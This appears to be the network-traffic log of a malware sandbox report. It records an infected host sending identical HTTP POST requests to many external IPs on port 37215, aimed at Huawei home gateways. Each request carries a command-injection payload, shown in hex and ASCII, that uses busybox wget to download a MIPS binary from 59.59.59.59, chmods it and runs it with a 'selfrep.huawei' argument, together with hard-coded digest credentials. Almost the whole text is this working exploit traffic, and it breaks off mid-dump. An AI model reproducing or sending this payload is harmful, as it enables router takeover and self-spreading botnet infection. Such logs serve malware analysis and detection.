                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          470192.168.2.153858441.52.251.23537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.581684113 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          471192.168.2.155372641.52.245.1737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.581738949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          472192.168.2.1559958209.135.135.24437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.581763983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          473192.168.2.154631841.2.133.21537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.581829071 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          474192.168.2.155913641.150.167.837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.581871033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          475192.168.2.1534346157.166.69.6137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.581888914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          476192.168.2.1555784157.165.188.17737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.581955910 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          477192.168.2.155106641.131.153.23437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.582005978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          478192.168.2.1552206197.12.204.8737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.572062016 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          479192.168.2.1538072157.107.228.23037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.572079897 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 